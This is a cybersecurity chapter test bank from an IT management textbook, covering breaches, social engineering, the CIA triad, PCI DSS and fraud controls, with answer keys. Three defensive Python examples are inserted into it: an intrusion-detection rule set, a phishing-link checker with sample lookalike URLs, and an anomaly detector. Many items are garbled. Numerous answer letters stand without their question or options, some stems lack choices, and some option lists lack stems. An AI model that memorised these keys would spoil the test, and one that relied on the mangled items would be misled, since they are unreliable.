Information Technology For Management Digital Strategies For Insight Action and Sustainable Performance 10th Edition Turban Test Bank 1
Test Bank
Multiple Choice
1. The discount retailer Target suffered a hacker attack during the fourth quarter of 2013
(4Q2013) that exposed customer account information. Which of the following was not an
impact of Target’s hacker attack and data breach?
a. 4Q 2013 profit dropped 46% and sales revenue fell 5.3% after the breach was
disclosed.
b. Gartner estimated the cost of the breach from $400 million to $450 million
c. Target faced 2 lawsuits—one related to privacy invasion and one for negligence.
d. The incident scared shoppers away, affecting the company’s profits throughout
2014.
Answer: C
Difficulty: Hard
Section Ref: Opening Case 5.1
AACSB: Dynamics of the global economy
2. Almost half of the 2013 breaches occurred in ________, where the largest number of records
was exposed—more than 540 million data records or 66 percent.
a. Asia
b. China
c. Europe
d. The United States
Answer: D
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
3. Negative consequences of lax cybersecurity that companies tend to face include all of the
following except ________.
Answer: B
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
4. The main cause of data breaches is ________, which is so successful because of ________
when management does not do enough to defend against cyberthreats.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
6. A(n) ________ attack bombards a network or website with traffic to crash it and leave it
vulnerable to other threats.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
7. Attacks ________ could significantly disrupt the functioning of government and business—
and trigger cascading effects far beyond the targeted sector and physical location of the
incident.
a. By hacktivists
b. By hackers
c. On critical infrastructure
d. On industrial control systems
Answer: C
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
8. Which of the following represents a cybersecurity concern about employees using their own
smartphones for work purposes?
a. Employees will spend too much time playing games or using entertainment and
recreation apps, thus reducing productivity.
b. Managers will be unable to monitor the time spent on personal calls made during
work hours.
c. Many personal smartphones do not have anti-malware or data encryption apps,
creating a security problem with respect to any confidential business data stored
on the device.
d. Consumer-quality equipment is more likely to break or malfunction than
enterprise-quality devices.
Answer: C
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
9. ________ is also known as human hacking—tricking users into revealing their credentials
and then using them to gain access to networks or accounts.
a. Android-hacking
b. BYOD
c. Hacktivism
d. Social engineering
Answer: D
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
10. Experts believe the three greatest cybersecurity dangers over the next few years will involve
all of the following except __________.
a. persistent threats
b. POS attacks
c. mobile computing
d. the use of social media
Answer: B
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
11. ____________ is/are defined as “systems and assets, whether physical or virtual, so vital to
the United States that the incapacity or destruction of such systems and assets would have a
debilitating impact on security, national economic security, national public health or safety,
or any combination of those matters.”
a. Critical infrastructure
b. Cyber architecture
c. National networks
d. Strategic assets
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
12. ___________ tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
a. Social engineering
b. Backdoor
c. BYOD
d. Password cracking
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
13. A stealth network attack in which an unauthorized person gains access to a network and
remains undetected for a long time is referred to as a(n) __________ attack.
a. registry denial
b. advanced persistent threat
c. DDOS
d. hacktivist
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
14. Cybercrime surveys have reported each of the following trends or findings except ________.
Answer: D
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
15. A key finding of the 2014 Global State of Information Security Survey was ________.
a. Too many companies are defending yesterday---that is, they rely on yesterday’s
cybersecurity practices that are ineffective at combating today’s threats.
b. Protecting all data at an equally high level is now practical and feasible.
c. Most companies implement stringent security policies before moving to cloud
computing, but not before implementing BYOD.
d. APTs require a new information-protection model that focuses on preventing
DDoS attacks.
Answer: A
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
17. According to cybersecurity experts, most data breaches go unreported because corporate
victims fear that disclosure would damage their stock price, or because ________.
Answer: B
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
18. One source of cybersecurity threats today are ____________who breach networks in an
attempt to gain media attention or for their cause.
a. Hacktivists
b. Political criminals
c. Industrial spies
d. Social engineers
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
19. A(n) ________ is a hacker who quietly attempts to breach secure networks looking for trade
secrets or proprietary information.
a. Hacktivist
b. Political criminal
c. Industrial spy
d. Identity thief
Answer: C
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
20. One of ________ specialties is finding websites with poor security, and then stealing and
posting information from them online.
a. LulzSec’s
b. RSA’s
c. Fraudsters’
d. Botmasters’
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
21. LulzSec and Anonymous are examples of ________ that have claimed responsibility for high
profile attacks designed to make a political statement, embarrass an organization or
government, or to gain publicity.
a. Hacktivists
b. Hostile government agents
c. Industrial spies
d. Cyber terrorists
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
22. The preferred method of hackers who want to steal trade secrets and other confidential
information from business organizations is ___________.
Answer: C
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
23. U.S. cybersecurity experts and government officials are increasingly concerned about
breaches from __________ into corporate networks, either through mobile devices or by
other means.
a. Domestic terrorists
b. Amateur hackers
c. Organized crime syndicates based in the United States
d. Other countries
Answer: D
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
24. Government and corporate officials concerned about security threats do not bring their own
cell phones or laptops when traveling overseas. Instead, they bring loaner devices and follow
strict security procedures including not connecting to their domestic network while out of the
country. These procedures are referred to as _________.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
25. The objectives of cybersecurity are to accomplish each of the following except _________.
a. Make data and documents available and accessible 24/7 while simultaneously
restricting access.
b. Promote secure and legal sharing of information among authorized persons and
partners.
c. Ensure compliance with supply chain business partners.
d. Detect, diagnose, and respond to incidents and attacks in real time.
Answer: C
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
c. Estimated cost, loss, or damage that can result from an exploit.
d. Tools or techniques that compromise a network.
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: D
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: D
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
30. Chris is a network manager for a large company. She receives daily updates about various
malware and then assesses how to best protect her organization’s network from attack. In
cybersecurity terminology, she is involved in __________.
a. Identifying exposure
b. Risk management
c. A security audit
d. Encryption defenses
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
32. When sending sensitive email, James uses a program that transforms data into unreadable
text to protect it from being understood by unauthorized users. James is using ________ to
protect his email communications.
a. Authentication
b. Defense-in-depth
c. Encryption
d. Hashing
Answer: C
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
33. Access to top secret or highly secure networks associated with Homeland Security or
national defense use authentication methods based on a biological feature, such as a
fingerprint or retinal scan to identify a person. These methods are called _____________.
a. Bio-Engineering
b. Physical security
c. Biometrics
d. Human factors
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
34. Most organizations use software or hardware devices to control access to their private
networks from the Internet by analyzing incoming and outgoing data packets. These devices
are called ___________.
a. Antimalware
b. Firewalls
c. Intrusion detection systems
d. Middleware
Answer: B
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
35. The ability of an IS to continue to operate when a failure occurs, but usually for a limited
time or at a reduced level is referred to as __________.
a. Fault tolerance
b. Hot site ready
c. Cold site ready
d. System override
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
36. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is ________, or the avoidance of unauthorized disclosure of
information or data.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
37. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is ____________, or the property that data or files have not been
altered in an unauthorized way.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
38. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is _________, or the property that data is accessible and
modifiable when needed by those authorized to do so.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: C
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
a. Record
b. Authenticate
c. Substantiate
d. Validate
Answer: B
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
40. Intrusion Detection Systems (IDS) are designed to monitor network traffic and identify
threats that have breached the networks’ initial defenses. IDS identify all of the following
except:
a. An attacker who is trying to break into the credentials of a legitimate user in order
to gain access to an IS, device, or network.
b. A legitimate user who performs actions he is not authorized to do.
c. A user who tries to disguise or cover up his actions by deleting audit files or
system logs.
d. Employees who use computing or network resources inefficiently.
Answer: D
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
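The three cases an IDS is expected to catch in question 40 (credential guessing against a legitimate account, a legitimate user performing an action outside his authorization, and deletion of audit logs to cover tracks) map directly onto detection rules. The following is an added example, not code from the textbook or its test bank: a small rule-based detector run over a constructed key=value audit trail. The role table, event names and log paths are assumptions chosen for the illustration. Note that nothing in it measures "efficient" use of resources, which is why option d is the correct "except" answer.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed role table and policy (assumptions for this example, not from the textbook).
ROLES = {"alice": {"user"}, "bob": {"user"}, "root": {"admin"}}
PRIVILEGED_EVENTS = {"config_change", "user_add"}      # require the admin role
LOG_PATHS = ("/var/log/", "/var/audit/")               # deleting these is log tampering


def parse(line):
    """Parse one 'key=value' audit line into a dict with a datetime timestamp."""
    rec = {}
    for token in line.split():
        key, _, value = token.partition("=")
        rec[key] = value
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect(lines, fail_threshold=5, window=timedelta(seconds=60)):
    """Return (rule, user, detail) alerts for the three IDS cases in the question."""
    alerts = []
    failures = defaultdict(list)          # (user, src) -> timestamps of recent failures
    for rec in map(parse, lines):
        user, event = rec.get("user"), rec.get("event")
        if event == "login_failed":
            # Rule 1: repeated failures for one account from one source inside the window.
            key = (user, rec.get("src"))
            recent = [t for t in failures[key] if rec["ts"] - t <= window]
            recent.append(rec["ts"])
            if len(recent) >= fail_threshold:
                alerts.append(("credential_guessing", user, rec.get("src")))
                recent = []               # reset so one burst raises one alert
            failures[key] = recent
        elif event in PRIVILEGED_EVENTS and "admin" not in ROLES.get(user, set()):
            # Rule 2: a legitimate user performing an action he is not authorized to do.
            alerts.append(("unauthorized_action", user, event))
        elif event == "file_delete" and rec.get("path", "").startswith(LOG_PATHS):
            # Rule 3: covering tracks by deleting audit files or system logs.
            alerts.append(("log_tampering", user, rec["path"]))
        # No rule looks at how "efficiently" resources are used: that is not an intrusion.
    return alerts


# Constructed sample audit trail (not real log data).
SAMPLE_LOG = [
    "ts=2014-01-15T09:00:01 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:00:03 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:00:05 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:00:08 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:00:11 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:00:14 user=alice event=login_failed src=198.51.100.7",
    "ts=2014-01-15T09:05:00 user=alice event=login_ok src=10.0.0.12",
    "ts=2014-01-15T10:12:40 user=bob event=config_change target=firewall",
    "ts=2014-01-15T10:13:02 user=bob event=file_delete path=/var/log/auth.log",
    "ts=2014-01-15T10:20:00 user=carol event=file_delete path=/home/carol/notes.txt",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The failure counter is keyed on (user, source) and trimmed to the sliding window, so a user who mistypes a password twice a day never trips rule 1, while six failures in thirteen seconds do. Carol's deletion of her own notes file is not flagged, because only paths under the audit and log directories count as tampering.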
41. While security threats from e-mail viruses and malware have been declining for years as e-
mail security has improved, threats from __________ have increased considerably in recent
years.
a. Software errors
b. Malicious employees
c. Social networks and cloud computing
d. Vendor sabotage
Answer: C
Difficulty: Easy
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
42. Facebook, YouTube, Twitter, LinkedIn, and other social networks are making IT security
dangers worse. Why?
a. Users invite in and build relationships with others. Cybercriminals hack into these
trusted relationships using stolen log-in credentials.
b. E-mail viruses and malware have been increasing for years even though e-mail
security has improved.
c. Communication has shifted from social networks to smartphones.
d. Web filtering, user education, and strict policies cannot help prevent IT security
dangers on Facebook and other social networks.
Answer: A
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Reflective thinking
43. When new vulnerabilities are found in operating systems, applications, or wired and wireless
networks, vendors of those products release __________ or __________ to fix the
vulnerabilities.
Answer: A
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
44. Which of the following is not a characteristic of money laundering and terrorist financing?
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Reflective thinking skills
45. Samuel received an email that looked like it came from his bank. The email told him to click
a link that opened an official looking Webpage where he was asked to enter his account
information. But when Samuel examined the URL, he noticed it was a strange address he did
not recognize. Most likely, someone was attempting to steal Samuel’s confidential
information using a technique called __________.
a. Botnets
b. Phishing
c. Spoofing
d. Click hijacking
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
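What Samuel did in question 45, looking past the page's appearance to the URL itself, can be written down as a check. The following is an added example, not code from the textbook or its test bank. It takes the link target and the domain the bank is known to use, and lists the reasons a practitioner would distrust the link: a host that merely contains the bank's name inside an unrelated domain, a raw IP address, userinfo before an @ sign (so the text the victim reads is not the host the browser connects to), a punycode label, or plain http. The sample links and the bank domain are constructed for the illustration.

```python
import ipaddress
from urllib.parse import urlsplit


def host_belongs_to(host, expected_domain):
    """True if host is the expected registrable domain or a subdomain of it."""
    return host == expected_domain or host.endswith("." + expected_domain)


def phishing_indicators(href, expected_domain):
    """Return a list of reasons the link should not be trusted (empty means no finding)."""
    parts = urlsplit(href.strip())
    host = (parts.hostname or "").lower()
    brand = expected_domain.split(".")[0]
    reasons = []
    if parts.scheme.lower() != "https":
        reasons.append("not https")
    if parts.username is not None:
        # "https://examplebank.com@evil.example/..." connects to evil.example.
        reasons.append("userinfo before @: the text before @ is not the host")
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a raw IP address")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label (possible homograph domain)")
    if not host_belongs_to(host, expected_domain):
        if brand in host:
            # The classic lure: the real domain is the rightmost labels, not the leftmost.
            reasons.append(f"brand '{brand}' embedded in unrelated host {host!r}")
        else:
            reasons.append(f"host {host!r} is not {expected_domain}")
    return reasons


# Constructed sample links for the illustration (examplebank.com is an assumed bank domain).
EXPECTED = "examplebank.com"
SAMPLE_LINKS = [
    "https://examplebank.com/login",
    "https://online.examplebank.com/accounts",
    "http://examplebank.com.secure-verify.net/login",
    "https://examplebank.com@203.0.113.5/login",
    "https://xn--exmplebank-cua.com/login",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", phishing_indicators(link, EXPECTED) or "no finding")
```

The domain comparison is deliberately a suffix match on the registrable domain rather than a substring match: "online.examplebank.com" is the bank, "examplebank.com.secure-verify.net" is not, and a substring test would accept both.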
46. In the United States, the Sarbanes–Oxley Act (SOX), Gramm-Leach-Bliley Act (GLB),
Federal Information Security Management Act (FISMA), and USA Patriot Act all require
businesses to __________________________.
Answer: C
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
47. The director of the Federal Trade Commission (FTC) bureau of consumer protection warned
that the agency would bring enforcement action against small businesses that ________
Answer: D
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
48. The principle of ________ acknowledges that the cost of information security needs to be
balanced with its benefits. It is the basic cost–benefit principle with which you are familiar.
a. accounting
b. economic use of resources
c. legality
d. COBIT
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
49. ________ is the supervision, monitoring, and control of an organization’s IT assets.
a. IT governance
b. Internal control
c. PCI DSS
d. FISMA
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
50. The purpose of the ________ is to improve customers’ trust in e-commerce, especially when
it comes to online payments, and to increase the Web security of online merchants.
a. IT governance
b. Internal control
c. PCI DSS
d. FISMA
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
b. IT security procedures and enforcement
c. Hardware and software selection
d. Acceptable use policies and IT security training
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
a. Data tampering
b. Worms
c. Phishing
d. Vectors
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
56. Storm worm, which is spread via spam, is a ________ agent embedded inside over 25
million computers. Storm’s combined power has been compared to the processing power of
________.
a. botnet; a supercomputer
b. spyware; a DDoS attack
c. vector; zombies
d. spear phishing; a server
Answer: A
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
57. Sometimes system failures and data or information loss can result from reasons other than an
intentional attempt to breach security. Unintentional threats are all of the following except
___________.
a. Political/civic unrest
b. Human errors
c. Environmental hazards
d. Computer systems failures
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
58. __________ is the elapsed time between when a vulnerability is discovered and when it is
exploited, and it has shrunk from months to __________.
a. Time-to-exploitation; days
b. Time-to-exploitation; minutes
c. Denial of service; days
d. Denial of service; seconds
Answer: B
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
Answer: D
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
60. The Payment Card Industry Data Security Standard (PCI DSS) created by Visa, MasterCard,
American Express, and Discover is a __________.
a. Set of standards required by U.S. and international law for protecting credit card
transaction data.
b. Set of industry standards required for all online merchants that store, process, or
transmit cardholder data.
c. Set of voluntary security guidelines for retailers who accept Visa, MasterCard,
American Express, and Discover credit cards.
d. Set of regulations (that vary from state to state, and country to country) that apply
to credit card companies.
Answer: B
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
61. Social networks and cloud computing have increased vulnerabilities in all of the following
ways except ________.
a. by providing a single point of failure and attack for organized criminal networks
b. In Twitter and Facebook, users invite in and build relationships with others.
Cybercriminals hack into these trusted relationships using stolen logins.
c. Twitter’s use of service packs and patches has not been effective.
d. These networks and services increase exposure to risk because of the time-to-
exploitation of today’s sophisticated spyware and mobile viruses
Answer: C
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
62. Business operations are controlled by apps, systems, and networks that are so interconnected
that anyone’s ________ is an entry point for attacks.
a. mobile device
b. botnet
c. BYOD
d. firewall
Answer: A
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
63. Voice and fingerprint _______ can significantly improve the security of physical devices and
provide stronger authentication for remote access or cloud services.
a. cryptography
b. biometrics
c. encryption
d. visualization
Answer: B
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
64. Crime can be divided into two categories depending on the tactics used to carry out the
crime: ________.
Answer: D
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
65. __________ are essential to the prevention and detection of occupational fraud.
Answer: B
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
66. The single-most effective fraud prevention tactic is making employees know that ________.
Answer: D
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
67. When it comes to fraud committed by an organization’s employees, the single most effective
fraud prevention technique is _______.
Answer: C
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
a. Detection
b. Lawsuits
c. Prevention
d. Prosecution
Answer: C
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
a. Managerial corruption
b. Insider or internal fraud
c. Corporate fraud
d. Intentional fraud
Answer: B
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
70. When it comes to defending against employee fraud, regulators look favorably on companies
that can demonstrate good __________ and best practices in operational risk management.
a. Corporate governance
b. Access to legal counsel
c. Relationships with security vendors
d. Awareness of industry standards
Answer: A
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
71. Detecting internal fraud has become sophisticated. Audit trails from key systems and
personnel records are stored in data warehouses and subjected to __________ where things
like excessive hours worked, unusual transactions, copying of huge amounts of data and
other unusual patterns of behavior are identified.
a. Security audits
b. Pattern analysis
c. Behavior recognition scans
d. Anomaly detection analysis
Answer: D
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
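Question 71 describes the mechanics of internal fraud detection: audit trails and personnel records are pooled and run through anomaly detection that picks out excessive hours, unusual transaction volumes and bulk copying of data. The following is an added example, not code from the textbook or its test bank, that shows one standard way to do that scoring. It uses modified z-scores (median and median absolute deviation) rather than mean and standard deviation, because a single extreme value inflates the mean and standard deviation enough to hide itself. The one-day per-employee summary is constructed data for the illustration.

```python
from statistics import median

# Constructed one-day audit summary per employee (not real personnel data):
# (employee, hours_worked, transactions, mb_copied)
RECORDS = [
    ("alice",    8.0,  24,   120),
    ("bob",      8.5,  30,   200),
    ("carol",    7.5,  22,    90),
    ("dave",     9.0,  35,   310),
    ("erin",     8.0,  28,   150),
    ("frank",    8.5,  26,   240),
    ("mallory", 15.0,  27, 48000),
    ("trent",    8.0, 210,   180),
]
METRICS = ("hours_worked", "transactions", "mb_copied")


def robust_z_scores(values):
    """Modified z-scores using median and MAD, so one extreme value cannot mask itself."""
    m = median(values)
    mad = median(abs(v - m) for v in values)
    if mad == 0:                       # all-identical column: nothing is anomalous
        return [0.0 for _ in values]
    # 0.6745 scales MAD to the standard deviation of a normal distribution.
    return [0.6745 * (v - m) / mad for v in values]


def find_anomalies(records, threshold=3.5):
    """Return (employee, metric, value, score) for every metric beyond the threshold."""
    findings = []
    for col, metric in enumerate(METRICS, start=1):
        values = [r[col] for r in records]
        for r, z in zip(records, robust_z_scores(values)):
            if abs(z) > threshold:
                findings.append((r[0], metric, r[col], round(z, 1)))
    return findings


if __name__ == "__main__":
    for employee, metric, value, score in find_anomalies(RECORDS):
        print(f"{employee:8s} {metric:13s} value={value:<8} score={score}")
```

With this data, Mallory is flagged for both hours worked and volume of data copied, and Trent for transaction count, while Dave's slightly above-median numbers on all three metrics stay well under the threshold. Scoring the mb_copied column with the ordinary mean and standard deviation instead gives Mallory a score below 3, because her own 48,000 MB drives the standard deviation to roughly 16,000; that is the failure mode the median/MAD form avoids. In practice the baseline would be per-employee history or a peer group with the same role, not a single day across the whole company.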
72. People who have their social security or credit card numbers stolen and used by thieves are
frequently victims of ___________________.
a. Insider fraud
b. Identity theft
c. Occupational corruption
d. Document sabotage
Answer: B
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
73. Internal fraud prevention and detection measures are based on __________ and __________.
Answer: B
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
74. The _________ is an exercise that determines the impact of losing the support or availability
of a resource.
Answer: A
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
75. The cybersecurity defense strategy and controls that should be used depend on __________.
Answer: C
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
76. A defense strategy requires several controls. _________are established to protect the system
regardless of the specific application.
a. Application controls
b. Physical controls
c. General controls
d. Authentication controls
Answer: C
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
77. A defense strategy requires several controls. ___________ protect computer facilities and
resources such as computers, data centers, software, manuals, and networks.
a. Application controls
b. Physical controls
c. General controls
d. Authentication controls
Answer: B
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
78. Physical security includes several controls. Which of the following is not a type of physical
control?
Answer: A
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
79. Which of the following is not a type of administrative control for information assurance and
risk management?
Answer: D
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
80. The internal control environment is the work atmosphere that a company sets for its
employees and is designed to achieve all of the following except _________.
Answer: B
Difficulty: Hard
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
a. Is an antifraud law
b. Forces more accurate business reporting and disclosure of GAAP (generally
accepted accounting principles) violations.
c. Makes it necessary to find and root out fraud.
d. Has been adopted by all countries in North America and the European Union
Answer: D
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB:
82. An audit is an important part of any control system. Which of the following is not a question
that would typically be asked as part of an information systems audit?
a. Are there sufficient controls in the system? Which areas are not covered by
controls?
b. Are the controls effective and implemented properly?
c. What is the ROI associated with system controls?
d. Are there procedures to ensure reporting and corrective actions in case of
violations of controls?
Answer: C
Difficulty: Hard
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
True/False
Answer: True
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
2. The main cause of a data breach is malware, but the reason hacking is so successful is
negligence—management not doing enough to defend against cyberthreats.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
5. Cyber-security experts warn that battling distributed denial-of-service and malware attacks
has become part of everyday business for all organizations.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
6. Managers should expect less tolerant regulators and greater fines and negative consequences
for data breaches, according to KPMG.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
7. Powerful IT security systems are needed to defend against what appears to be authorized
access to a network or application.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
8. It is often easy to get users to infect their corporate network or mobiles by tricking them into
downloading and installing malicious apps or backdoors.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
9. When an employee’s device is lost, the company can suffer a data breach if the device is not
encrypted.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
10. Since protecting all data at an equally high level is not practical, cybersecurity strategies need
to classify and prioritize defenses.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
11. Botnets are stealth network attacks in which an unauthorized person gains access to a
network and remains undetected for a long time to steal data continuously.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
12. Most data breaches go unreported, according to cybersecurity experts, because corporate
victims fear that disclosure would damage their stock price, or because they never knew they
were hacked in the first place.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
13. The smart strategy is to invest more to protect the company’s most valuable assets rather than
try to protect all assets equally.
Answer: True
